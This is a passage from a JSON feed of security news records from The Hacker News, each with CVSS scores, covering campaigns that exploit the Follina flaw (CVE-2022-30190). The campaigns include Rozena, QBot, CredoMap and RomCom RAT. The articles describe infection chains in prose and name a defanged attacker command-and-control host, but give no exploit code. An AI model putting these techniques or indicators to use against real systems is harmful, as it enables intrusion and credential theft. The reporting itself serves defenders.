([CVE-2022-30190](<https://thehackernews.com/2023/05/xworm-malware-exploits-follina.html>)) to download an MSI package from a remote server.\n\nThe installer, for its part, deploys a downloader written in Lua called SunSeed (or its Visual Basic Script equivalent) that, in turn, retrieves an AutoHotkey-based malware known as AHK Bot from a remote server.\n\nWhat's notable about Asylum Ambuscade is its cybercrime spree that has claimed over 4,500 victims across the world since January 2022, with a majority of them located in North America, Asia, Africa, Europe, and South America.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhD9rHPkfZV5rslcZvYm6hgZ3Lk4qOIRniY6qUBUV8Y12zEbBLztFeew8CseNEhk_KGvme7kJGTF1drnbaDIDvVdJYgNMumpURP0hyHGAGEzJ1HqvHW-da0FChM7HiNMbz2h5GNPW_qR-14O4AYrHTyPYP99N5E1o4nNb7iSYimyfxd36FH5NjS5t5N/s728-e365/cyber.jpg>)\n\n\"The targeting is very wide and mostly includes individuals, cryptocurrency traders, and small and medium businesses (SMBs) in various verticals,\" ESET researcher Matthieu Faou said.\n\nWhile one aspect of the attacks is designed to steal cryptocurrency, the targeting of SMBs is likely an attempt to monetize the access by selling it to other cybercriminal groups for illicit profits.\n\nThe compromise chain follows a similar pattern barring the initial intrusion vector, which entails the use of a rogue Google Ad or a traffic direction system (TDS) to redirect potential victims to a bogus website delivering a malware-laced JavaScript file.\n\nUPCOMING WEBINAR\n\n\ud83d\udd10 Mastering API Security: Understanding Your True Attack Surface\n\nDiscover the untapped vulnerabilities in your API ecosystem and take proactive steps towards ironclad security. Join our insightful webinar!\n\n[Join the Session](<https://thn.news/z-inside-2>)\n\nThe attacks have also made use of a Node.js version of AHK Bot codenamed NODEBOT that's then used to download plugins responsible for taking screenshots, plundering passwords, gathering system information, and installing additional trojans and stealers.\n\nGiven the almost identical attack chains across cybercrime and espionage efforts, it's suspected that \"Asylum Ambuscade is a cybercrime group that is doing some cyber espionage on the side.\"\n\nThe overlaps also extend to another activity cluster dubbed [Screentime](<https://thehackernews.com/2023/02/hackers-targeting-us-and-german-firms.html>) that's known to target companies in the U.S. and Germany with bespoke malware designed to steal confidential information. Proofpoint is tracking the threat actor under the name TA866.\n\n\"It is quite unusual to catch a cybercrime group running dedicated cyberespionage operations,\" Faou said, making it somewhat of a rarity in the threat landscape.\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-06-09T13:37:00", "type": "thn", "title": "Asylum Ambuscade: A Cybercrime Group with Espionage Ambitions", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-06-09T13:37:53", "id": "THN:273B5BCEB3A6EC52EA8B8BB5D09A21BF", "href": "https://thehackernews.com/2023/06/asylum-ambuscade-cybercrime-group-with.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-12T03:58:26", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgqkZlda0c2g2igRLTOdrEftzHnVaYPBW5GyWFxmq2gYpwQJC85xMudeBpTILNLmjRqpCEQzJ1BHrUDtlNVaYEIjBIszT-yfr5cd_4eB48Ayxqg8tZogsoHViYpX26Bhq8NdJI9qMvqSr-H6uCMSDiHFlPWqQDWupWrWorWtPcyR3TFN-oXdcQihirY/s728-e100/hacking.jpg>)\n\nA newly observed phishing campaign is leveraging the recently disclosed Follina security vulnerability to distribute a previously undocumented backdoor on Windows systems.\n\n\"Rozena is a backdoor malware that is capable of injecting a remote shell connection back to the attacker's machine,\" Fortinet FortiGuard Labs researcher Cara Lin [said](<https://www.fortinet.com/blog/threat-research/follina-rozena-leveraging-discord-to-distribute-a-backdoor>) in a report this week.\n\nTracked as [CVE-2022-30190](<https://thehackernews.com/2022/06/russian-hackers-exploiting-microsoft.html>), the now-patched Microsoft Windows Support Diagnostic Tool (MSDT) remote code execution vulnerability has come under heavy exploitation in recent weeks ever since it came to light in late May 2022.\n\nThe starting point for the latest attack chain observed by Fortinet is a weaponized [Office document](<https://www.virustotal.com/gui/file/432bae48edf446539cae5e20623c39507ad65e21cb757fb514aba635d3ae67d6/details>) that, when opened, connects to a [Discord CDN URL](<https://thehackernews.com/2021/04/alert-theres-new-malware-out-there.html>) to retrieve an HTML file (\"[index.htm](<https://www.virustotal.com/gui/file/3558840ffbc81839a5923ed2b675c1970cdd7c9e0036a91a0a728af14f80eff3/details>)\") that, in turn, invokes the diagnostic utility using a PowerShell command to download next-stage payloads from the same CDN attachment space.\n\nThis includes the Rozena implant (\"Word.exe\") and a batch file (\"cd.bat\") that's designed to terminate MSDT processes, establish the backdoor's persistence by means of Windows Registry modification, and download a harmless Word document as a decoy.\n\nThe malware's core function is to inject shellcode that launches a reverse shell to the attacker's host (\"microsofto.duckdns[.]org\"), ultimately allowing the attacker to take control of the system required to monitor and capture information, while also maintaining a backdoor to the compromised system.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjNyfAHkPqncAqB7jBg-H99Da5bf5sDt90p5YIMCVig5r88OcsOiWbgLBm5chCwciSnEGnHkhKHFgCzl9qJf1Ql9z0-jpkW4CI2LK1BIBn1cVtJNPYaa1pzTkmENbZ0p1h3IvCyZFRCzMHMsO22B7F7pxaB5wNSsgFBdDzMX15lBztI2-cZOcLDb0De/s728-e100/hack.jpg>)\n\nThe exploitation of the Follina flaw to distribute malware through malicious Word documents comes as social engineering attacks are [relying](<https://www.fortinet.com/blog/threat-research/notable-droppers-emerge-in-recent-threat-campaigns>) on Microsoft Excel, Windows shortcut (LNK), and ISO image files as droppers to deploy malware such as [Emotet](<https://thehackernews.com/2022/06/new-emotet-variant-stealing-users.html>), [QBot](<https://thehackernews.com/2022/01/researchers-decrypted-qakbot-banking.html>), [IcedID](<https://thehackernews.com/2022/04/new-hacking-campaign-targeting.html>), and [Bumblebee](<https://thehackernews.com/2022/07/trickbot-malware-shifted-its-focus-on.html>) to a victim's device.\n\nThe droppers are said to be distributed through emails that contain directly the dropper or a password-protected ZIP as an attachment, an HTML file that extracts the dropper when opened, or a link to download the dropper in the body of the email.\n\nWhile attacks spotted in early April prominently featured Excel files with XLM macros, Microsoft's decision to block macros by default around the same time is said to have forced the threat actors to pivot to alternative methods like [HTML smuggling](<https://thehackernews.com/2021/11/hackers-increasingly-using-html.html>) as well as .LNK and .ISO files.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgM-Z0W8o0gQ_-NFu3LEc4vr3-E4xCQdiYnwKGPPpujdLoGmbSycdUIu9d7yXk-CAqmujZXrhriSPIZT6u_fuZ4gl3MdLu9mfa5S7Ax7GXz6vh_OnWC3CgFF05v5790zMvuesJugC_saocqG0c50_NWWevAwBkithkqwummnbyocnsUs1R8mrV9mDAb/s728-e100/hackers.jpg>)\n\nLast month, Cyble disclosed details of a malware tool called [Quantum](<https://thehackernews.com/2022/06/new-quantum-builder-lets-attackers.html>) that's being sold on underground forums so as to equip cybercriminal actors with capabilities to build malicious .LNK and .ISO files.\n\nIt's worth noting that [macros](<https://docs.microsoft.com/en-us/microsoft-365/security/intelligence/macro-malware>) have been a tried-and-tested [attack vector](<https://www.welivesecurity.com/2022/06/16/how-emotet-is-changing-tactics-microsoft-tightening-office-macro-security/>) for adversaries looking to drop ransomware and other malware on Windows systems, whether it be through phishing emails or other means.\n\nMicrosoft has since [temporarily paused](<https://thehackernews.com/2022/07/microsoft-quietly-rolls-back-plan-to.html>) its plans to disable Office macros in files downloaded from the internet, with the company telling The Hacker News that it's taking the time to make \"additional changes to enhance usability.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-09T08:49:00", "type": "thn", "title": "Hackers Exploiting Follina Bug to Deploy Rozena Backdoor", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-07-12T03:25:38", "id": "THN:35E0781FC3AEDCA2324C9B95396A5FF7", "href": "https://thehackernews.com/2022/07/hackers-exploiting-follina-bug-to.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-09T05:56:38", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiwTkerV_vHTBX6raliukL7HMmC-07MaqMLisxHNJsLFg2u_5hzd4ZSaJnJFMLEm0SVlgLnMNI92Aa_h88r1yM_IGDxGstGOjGOIKVBGqorBSAAMipARKlu8r3LBRAsgA8eMxIOakvY7qqrCIOl1eaoGiXrTVXgPmcTvvLkPjETYV958M7PhFiGwY3e/s728-e100/hacking.jpg>)\n\nAn unofficial security patch has been made available for a new Windows zero-day vulnerability in the Microsoft Support Diagnostic Tool (MSDT), even as the Follina flaw continues to be exploited in the wild.\n\nThe issue \u2014 referenced as **DogWalk** \u2014 relates to a path traversal flaw that can be exploited to stash a malicious executable file to the Windows Startup folder when a potential target opens a specially crafted \".diagcab\" archive file that contains a diagnostics configuration file.\n\nThe idea is that the payload would get executed the next time the victim logs in to the system after a restart. The vulnerability affects all Windows versions, starting from Windows 7 and Server Server 2008 to the latest releases.\n\nDogWalk was originally [disclosed](<https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd>) by security researcher Imre Rad in January 2020 after Microsoft, having acknowledged the problem, deemed it as not a security issue.\n\n\"There are a number of file types that can execute code in such a way but aren't technically 'executables,'\" the tech giant said at the time. \"And a number of these are considered unsafe for users to download/receive in email, even '.diagcab' is blocked by default in Outlook on the web and other places.\"\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjwRgjGLI9aF8GGCJ21kc1Qb8R_OxNcdWLs-zRvaLoVcCrG09nD-xcOfE8LIElgnsXnfWznza6qP97ZirQ6SfMXCGN0TFK9XKjmm1Vl68Atu0RGUgpXh9rJ3kygy6lvLlR0bWkN0HolGLD7oh2TXsGE81KbEmYzDcLwQNm8sC0yQCVCw6UvA8jyuVrF/s728-e100/windows.gif>)\n\nWhile all files downloaded and received via email include a Mark-of-the-Web ([MOTW](<https://attack.mitre.org/techniques/T1553/005/>)) tag that's used to determine their origin and trigger an appropriate security response, 0patch's Mitja Kolsek noted that the MSDT application is not designed to check this flag and hence allows the .diagcab file to be opened without warning.\n\n\"Outlook is not the only delivery vehicle: such file is cheerfully downloaded by all major browsers including Microsoft Edge by simply visiting(!) a website, and it only takes a single click (or mis-click) in the browser's downloads list to have it opened,\" Kolsek [said](<https://blog.0patch.com/2022/06/microsoft-diagnostic-tools-dogwalk.html>).\n\n\"No warning is shown in the process, in contrast to downloading and opening any other known file capable of executing [the] attacker's code.\"\n\nThe patches and the [renewed interest](<https://twitter.com/j00sean/status/1532416426702786560>) in the zero-day bug follow [active exploitation](<https://thehackernews.com/2022/06/state-backed-hackers-exploit-microsoft.html>) of the \"[Follina](<https://thehackernews.com/2022/05/watch-out-researchers-spot-new.html>)\" remote code execution vulnerability by leveraging malware-laced Word documents that abuse the \"ms-msdt:\" protocol URI scheme.\n\nAccording to enterprise security firm Proofpoint, the flaw (CVE-2022-30190, CVSS score: 7.8) is being weaponized by a threat actor tracked as [TA570](<https://thehackernews.com/2021/06/ransomware-attackers-partnering-with.html>) to deliver the [QBot](<https://thehackernews.com/2022/01/researchers-decrypted-qakbot-banking.html>) (aka Qakbot) information-stealing trojan.\n\n\"Actor uses thread hijacked messages with HTML attachments which, if opened, drop a ZIP archive,\" the company [said](<https://twitter.com/threatinsight/status/1534227444915482625>) in a series of tweets detailing the phishing attacks.\n\n\"Archive contains an IMG with a Word doc, shortcut file, and DLL. The LNK will execute the DLL to start QBot. The doc will load and execute a HTML file containing PowerShell abusing CVE-2022-30190 used to download and execute QBot.\"\n\nQBot has also been employed by [initial access brokers](<https://thehackernews.com/2021/06/ransomware-attackers-partnering-with.html>) to gain initial access to target networks, enabling ransomware affiliates to [abuse the foothold](<https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/>) to deploy file-encrypting malware.\n\nThe DFIR Report, earlier this year, also [documented](<https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/>) how QBot infections move at a rapid pace, enabling the malware to harvest browser data and Outlook emails a mere 30 minutes after initial access and propagate the payload to an adjacent workstation around the 50-minute mark.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-08T14:24:00", "type": "thn", "title": "Researchers Warn of Unpatched \"DogWalk\" Microsoft Windows Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-09T05:26:49", "id": "THN:A24E3ECC17FDA35932981ED1D0B9B351", "href": "https://thehackernews.com/2022/06/researchers-warn-of-unpatched-dogwalk.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-07T15:29:02", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhTNQLTqzRs1icO7nDf4jqaFdrqEQOglIjZdWwjLdPrfKMRyk55GksD5wNcAuXtq2syUw1ZGchuL7kfSaCip0NcKRKc0tvt4HKsngNfLJLu_wGgxPW6x3UL9JFBm5cSmmq4EorVcffa9KUUO0-_bLx-vTe857ciAdVTPSOFQ_XHk1j7o3-Tuau9QxI9/s728-e100/russian-hackers.jpg>)\n\nThe Computer Emergency Response Team of Ukraine (CERT-UA) has [cautioned](<https://cert.gov.ua/article/341128>) of a new set of spear-phishing attacks exploiting the \"Follina\" flaw in the Windows operating system to deploy password-stealing malware.\n\nAttributing the intrusions to a Russian nation-state group tracked as APT28 (aka Fancy Bear or Sofacy), the agency said the attacks commence with a lure document titled \"Nuclear Terrorism A Very Real Threat.rtf\" that, when opened, exploits the recently disclosed vulnerability to download and execute a malware called CredoMap.\n\nFollina ([CVE-2022-30190](<https://thehackernews.com/2022/06/state-backed-hackers-exploit-microsoft.html>), CVSS score: 7.8), which concerns a case of remote code execution affecting the Windows Support Diagnostic Tool (MSDT), was addressed by Microsoft on June 14, as part of its [Patch Tuesday updates](<https://thehackernews.com/2022/06/patch-tuesday-microsoft-issues-fix-for.html>), but not before it was subjected to widespread zero-day exploit activity by numerous threat actors.\n\nAccording to an independent report published by Malwarebytes, [CredoMap](<https://www.virustotal.com/gui/file/2318ae5d7c23bf186b88abecf892e23ce199381b22c8eb216ad1616ee8877933/detection>) is a variant of the .NET-based credential stealer that Google Threat Analysis Group (TAG) [divulged](<https://thehackernews.com/2022/05/ukraine-war-themed-files-become-lure-of.html>) last month as having been deployed against users in Ukraine.\n\nThe malware's main purpose is to siphon data, including passwords and saved cookies, from several popular browsers such as Google Chrome, Microsoft Edge, and Mozilla Firefox.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh1wPqkssWrspfFOV5JuqLYAuDaLjNgv0a4oY8utz6q-r8kkw4cw-U5qVZ_722pltmgZkJurfEHQKzfPepXA4DbY8QO48_whxdsmYcUA_f9jEjd-cYusjkZBmv0ozmOrz7CoM8xsOCjZyhYHFAjAYS5s_55J1l_yYV7WaDuogX68QqWZhDqjL9e9Bt5/s728-e100/russian.jpg>)\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEikeYfsPFY9KOWRt-wVKU533O8GTExdxYCnObIBP0XUPKaMQxzFMHJjcimjK_PVdu4_vU7TcyG4zQwzEroQSc6F8tl_QlNVzIi3GT6HY9Ufv-qcHbOr40bklODPdP5PJxl6VSNABxjdm24e3cx6nkZE-6G_dmvdoCwngGhCBnBIc6gf-EiESSQaoAcZ/s728-e100/ms.jpg>)\n\n\"Although ransacking browsers might look like petty theft, passwords are the key to accessing sensitive information and intelligence,\" Malwarebytes [said](<https://blog.malwarebytes.com/threat-intelligence/2022/06/russias-apt28-uses-fear-of-nuclear-war-to-spread-follina-docs-in-ukraine/>). \"The target, and the involvement of APT28, a division of Russian military intelligence), suggests that campaign is a part of the conflict in Ukraine, or at the very least linked to the foreign policy and military objectives of the Russian state.\"\n\nIt's not just APT28. CERT-UA has further [warned](<https://cert.gov.ua/article/160530>) of [similar](<https://cert.gov.ua/article/339662>) [attacks](<https://cert.gov.ua/article/40559>) mounted by [Sandworm](<https://thehackernews.com/2022/04/us-offers-10-million-bounty-for.html>) and an actor dubbed UAC-0098 that leverage a Follina-based infection chain to deploy CrescentImp and Cobalt Strike Beacons on to targeted hosts in media and critical infrastructure entities.\n\nThe development comes as Ukraine continues to be a [target for cyberattacks](<https://thehackernews.com/2022/05/ukrainian-cert-warns-citizens-of-new.html>) amidst the country's ongoing war with Russia, with [Armageddon hackers](<https://thehackernews.com/2022/04/russian-hackers-tried-attacking.html>) also spotted [distributing](<https://www.zscaler.com/blogs/security-research/hermeticwiper-resurgence-targeted-attacks-ukraine>) the [GammaLoad.PS1_v2 malware](<https://cert.gov.ua/article/40240>) in May 2022.\n\n**_Update:_** Amidst relentless hacking attempts tailored to drop malware in Ukrainian organizations, Microsoft revealed in a [special report](<https://blogs.microsoft.com/on-the-issues/2022/06/22/defending-ukraine-early-lessons-from-the-cyber-war/>) that state-backed Russian hackers have engaged in \"strategic espionage\" against 128 targets spanning governments, think tanks, businesses, and aid groups in 42 countries supporting Kyiv since the onset of the war.\n\n49% of the observed activity focused on government agencies, followed by IT (20%), critical infrastructure (19%), and NGOs (12%). Just 29% of these intrusions are said to have been successful, with a quarter of the incidents leading to the exfiltration of sensitive data.\n\n\"To date, the Russians haven't used destructive 'wormable' malware that can jump from one computer domain to another and thereby cross international borders to spread economic damage,\" the Redmond-based tech giant said.\n\n\"Instead, they are designing attacks to stay within Ukraine. While Russia has been careful to confine its destructive malware to specific network domains located within Ukraine itself, these attacks are more sophisticated and widespread.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-22T12:51:00", "type": "thn", "title": "Russian Hackers Exploiting Microsoft Follina Vulnerability Against Ukraine", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-09-07T14:46:15", "id": "THN:B8CBCDA7152660D9AE3D4E058B7B9B0F", "href": "https://thehackernews.com/2022/06/russian-hackers-exploiting-microsoft.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-07-11T04:24:57", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgFHymFOJd3tPPoZ3CmzEE1JuGEeJB_buMcEX7y9U9LXqwzhudzbUxmKboFn0vfRh64d5ZU04qA9VIx3frHrYgN98TrWzJXK7xKO3jT9zLm5grspYmrMg7C1UhSw4cNPiHsje4SzM_AGbLVo-TsCje_Emgro9q0RBJIwFhU9uKpG6zVtcl-YDB83sSw6XjI/s728-e365/tkfhFBCm.jpg>)\n\nThe threat actors behind the RomCom RAT have been suspected of phishing attacks targeting the [upcoming NATO Summit](<https://en.wikipedia.org/wiki/2023_Vilnius_summit>) in Vilnius as well as an identified organization supporting Ukraine abroad.\n\nThe findings come from the BlackBerry Threat Research and Intelligence team, which [found](<https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit>) two malicious documents submitted from a Hungarian IP address on July 4, 2023.\n\nRomCom, also tracked under the names Tropical Scorpius, UNC2596, and Void Rabisu, was [recently observed](<https://thehackernews.com/2023/05/romcom-rat-using-deceptive-web-of-rogue.html>) staging cyber attacks against politicians in Ukraine who are working closely with Western countries and a U.S.-based healthcare organization involved with aiding refugees fleeing the war-torn country.\n\nAttack chains mounted by the group are geopolitically motivated and have employed spear-phishing emails to point victims to cloned websites hosting trojanized versions of popular software. Targets include militaries, food supply chains, and IT companies.\n\nThe latest lure documents identified by BlackBerry impersonate Ukrainian World Congress, a legitimate non-profit, (\"[Overview_of_UWCs_UkraineInNATO_campaign.docx](<https://www.virustotal.com/gui/file/a61b2eafcf39715031357df6b01e85e0d1ea2e8ee1dfec241b114e18f7a1163f>)\") and feature a bogus letter declaring support for Ukraine's inclusion to NATO (\"[Letter_NATO_Summit_Vilnius_2023_ENG(1).docx](<https://www.virustotal.com/gui/file/3a3138c5add59d2172ad33bc6761f2f82ba344f3d03a2269c623f22c1a35df97>)\").\n\n\"Although we haven't yet uncovered the initial infection vector, the threat actor likely relied on spear-phishing techniques, engaging their victims to click on a specially crafted replica of the Ukrainian World Congress website,\" the Canadian company said in an analysis published last week.\n\nOpening the file triggers a sophisticated execution sequence that entails retrieving intermediate payloads from a remote server, which, in turn, exploits Follina ([CVE-2022-30190](<https://thehackernews.com/2023/05/xworm-malware-exploits-follina.html>)), a now-patched security flaw affecting Microsoft's Support Diagnostic Tool (MSDT), to achieve remote code execution.\n\nUPCOMING WEBINAR\n\n[\ud83d\udd10 PAM Security \u2013 Expert Solutions to Secure Your Sensitive Accounts\n\n](<https://thn.news/pam-webinar>)\n\nThis expert-led webinar will equip you with the knowledge and strategies you need to transform your privileged access security strategy.\n\n[Reserve Your Spot](<https://thn.news/pam-webinar>)\n\nThe result is the deployment of RomCom RAT, an executable written in C++ that's designed to collect information about the compromised system and remote commandeer it.\n\n\"Based on the nature of the upcoming NATO Summit and the related lure documents sent out by the threat actor, the intended victims are representatives of Ukraine, foreign organizations, and individuals supporting Ukraine,\" BlackBerry said.\n\n\"Based on the available information, we have medium to high confidence to conclude that this is a RomCom rebranded operation, or that one or more members of the RomCom threat group are behind this new campaign supporting a new threat group.\"\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-07-10T06:42:00", "type": "thn", "title": "RomCom RAT Targeting NATO and Ukraine Support Groups", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-07-11T03:32:37", "id": "THN:C17A0F3DD156CF2240FAEABA6716D0E9", "href": "https://thehackernews.com/2023/07/romcom-rat-targeting-nato-and-ukraine.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-31T17:56:10", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh4XDd5jxlShcQhkpFMeDWuIXh2lmuW6g-pOpYsWcAxsVQeXRD_zrP4VSvk676NwsbCPmQ3N8RbQ0Ox5emUCLWdANDTfkxyX8ZNmIeOx8--iO40HnXyGESjApgsZEkN1p7JZLQWLLVJ3imK_5umSJiUUWXduvPJeQ_nLWxfSUN92U64HfLhpAUbxKty/s728-e100/Windows-Update.jpg>)\n\nMicrosoft on Monday published guidance for a newly discovered [zero-day security flaw](<https://thehackernews.com/2022/05/watch-out-researchers-spot-new.html>) in its Office productivity suite that could be exploited to achieve code execution on affected systems.\n\nThe weakness, now assigned the identifier [CVE-2022-30190](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190>), is rated 7.8 out of 10 for severity on the CVSS vulnerability scoring system. Microsoft Office versions Office 2013, Office 2016, Office 2019, and Office 2021, as well as Professional Plus editions, are impacted. \n\n\"To help protect customers, we've published CVE-2022-30190 and additional guidance [here](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>),\" a Microsoft spokesperson told The Hacker News in an emailed statement.\n\nThe [Follina](<https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e>) vulnerability, which came to light late last week, involved a real-world exploit that leveraged the shortcoming in a weaponized Word document to execute arbitrary PowerShell code by making use of the \"ms-msdt:\" URI scheme. The sample was uploaded to VirusTotal from Belarus.\n\nBut first signs of exploitation of the flaw date back to April 12, 2022, when a second sample was uploaded to the malware database. This artifact is believed to have targeted users in Russia with a malicious Word document (\"[\u043f\u0440\u0438\u0433\u043b\u0430\u0448\u0435\u043d\u0438\u0435 \u043d\u0430 \u0438\u043d\u0442\u0435\u0440\u0432\u044c\u044e.doc](<https://www.virustotal.com/gui/file/710370f6142d945e142890eb427a368bfc6c5fe13a963f952fb884c38ef06bfa/detection/>)\") that masqueraded as an interview invitation with Sputnik Radio.\n\n\"A remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as 